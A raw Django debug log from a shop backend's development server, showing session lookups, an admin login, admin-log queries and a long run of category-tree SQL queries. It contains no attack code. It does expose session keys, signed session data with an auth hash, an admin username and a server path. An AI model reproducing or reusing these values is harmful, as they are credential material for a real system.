"django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T07:45:32.931563+00:00'::timestamptz AND "django_session"."session_key" = 'a6besg1e18ujrqsh8scsz6tnflleeqah'); args=(datetime.datetime(2019, 12, 27, 7, 45, 32, 931563, tzinfo=), 'a6besg1e18ujrqsh8scsz6tnflleeqah') DEBUG 2019-12-27 07:45:32,944 utils 32264 139909917935360 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'resfx-admin'; args=('resfx-admin',) DEBUG 2019-12-27 07:45:33,168 utils 32264 139909917935360 (0.001) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi' LIMIT 1; args=('n3ivi381xmnaa5u6x9ab1f3m1fn6pizi',) DEBUG 2019-12-27 07:45:33,169 utils 32264 139909917935360 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('n3ivi381xmnaa5u6x9ab1f3m1fn6pizi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-10T07:45:33.168408+00:00'::timestamptz); args=('n3ivi381xmnaa5u6x9ab1f3m1fn6pizi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 10, 7, 45, 33, 168408, tzinfo=)) DEBUG 2019-12-27 07:45:33,171 utils 32264 139909917935360 (0.000) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE "django_session"."session_key" = 'a6besg1e18ujrqsh8scsz6tnflleeqah'; args=('a6besg1e18ujrqsh8scsz6tnflleeqah',) DEBUG 2019-12-27 07:45:33,172 utils 32264 139909917935360 (0.001) DELETE FROM "django_session" WHERE "django_session"."session_key" IN ('a6besg1e18ujrqsh8scsz6tnflleeqah'); args=('a6besg1e18ujrqsh8scsz6tnflleeqah',) DEBUG 2019-12-27 07:45:33,175 utils 32264 139909917935360 (0.001) UPDATE "auth_user" SET "last_login" = '2019-12-27T07:45:33.173458+00:00'::timestamptz WHERE "auth_user"."id" = 6; args=(datetime.datetime(2019, 12, 27, 7, 45, 33, 173458, tzinfo=), 6) DEBUG 2019-12-27 07:45:33,178 utils 32264 139909917935360 (0.000) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-10T07:45:33.177101+00:00'::timestamptz WHERE "django_session"."session_key" = 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 10, 7, 45, 33, 177101, tzinfo=), 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi') [27/Dec/2019 07:45:33] "POST /login/?next=/ HTTP/1.0" 302 0 DEBUG 2019-12-27 07:45:33,455 utils 32264 139909917935360 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T07:45:33.446544+00:00'::timestamptz AND "django_session"."session_key" = 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi'); args=(datetime.datetime(2019, 12, 27, 7, 45, 33, 446544, tzinfo=), 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi') DEBUG 2019-12-27 07:45:33,457 utils 32264 139909917935360 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-27 07:45:33,490 utils 32264 139909917935360 (0.002) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-27 07:45:33,498 utils 32264 139909917935360 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-10T07:45:33.496826+00:00'::timestamptz WHERE "django_session"."session_key" = 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 10, 7, 45, 33, 496826, tzinfo=), 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi') [27/Dec/2019 07:45:33] "GET / HTTP/1.0" 200 8878 Not Found: /api/api-token-auth/ [27/Dec/2019 07:45:48] "OPTIONS /api/api-token-auth/ HTTP/1.0" 404 6547 DEBUG 2019-12-27 07:46:30,708 utils 32264 139909917935360 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T07:46:30.699276+00:00'::timestamptz AND "django_session"."session_key" = 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi'); args=(datetime.datetime(2019, 12, 27, 7, 46, 30, 699276, tzinfo=), 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi') DEBUG 2019-12-27 07:46:30,711 utils 32264 139909917935360 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-27 07:46:30,742 utils 32264 139909917935360 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-27 07:46:30,751 utils 32264 139909917935360 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-10T07:46:30.749589+00:00'::timestamptz WHERE "django_session"."session_key" = 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 10, 7, 46, 30, 749589, tzinfo=), 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi') [27/Dec/2019 07:46:30] "GET / HTTP/1.0" 200 8878 /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Performing system checks... December 27, 2019 - 07:37:21 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-12-27 07:46:33,282 utils 32506 139738808882944 (0.005) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-27 07:46:33,289 utils 32506 139738808882944 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-12-27 07:46:40,101 utils 32506 139738707130112 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T07:46:40.091273+00:00'::timestamptz AND "django_session"."session_key" = 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi'); args=(datetime.datetime(2019, 12, 27, 7, 46, 40, 91273, tzinfo=), 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi') DEBUG 2019-12-27 07:46:40,104 utils 32506 139738707130112 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-27 07:46:40,165 utils 32506 139738707130112 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-27 07:46:40,174 utils 32506 139738707130112 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-10T07:46:40.172770+00:00'::timestamptz WHERE "django_session"."session_key" = 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 10, 7, 46, 40, 172770, tzinfo=), 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi') [27/Dec/2019 07:46:40] "GET / HTTP/1.0" 200 8208 DEBUG 2019-12-27 07:47:26,770 utils 32506 139738707130112 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T07:47:26.760081+00:00'::timestamptz AND "django_session"."session_key" = 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi'); args=(datetime.datetime(2019, 12, 27, 7, 47, 26, 760081, tzinfo=), 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi') DEBUG 2019-12-27 07:47:26,772 utils 32506 139738707130112 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-27 07:47:26,802 utils 32506 139738707130112 (0.002) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-27 07:47:26,810 utils 32506 139738707130112 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-10T07:47:26.808630+00:00'::timestamptz WHERE "django_session"."session_key" = 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 10, 7, 47, 26, 808630, tzinfo=), 'n3ivi381xmnaa5u6x9ab1f3m1fn6pizi') [27/Dec/2019 07:47:26] "GET / HTTP/1.0" 200 8208 DEBUG 2019-12-27 07:51:33,863 utils 32506 139738707130112 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:51:33,872 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:51:33,875 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:51:33,878 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:51:33,881 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:51:33,883 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:51:33,886 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:51:33,888 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:51:33,890 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:51:33,893 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:51:33,896 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:51:33,898 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:51:33,901 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:51:33,903 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:51:33,906 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:51:33,909 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:51:33,911 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:51:33,913 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:51:33,915 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:51:33,919 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:51:33,921 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:51:33,924 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:51:33,927 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:51:33,929 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:51:33,931 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:51:33,935 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; 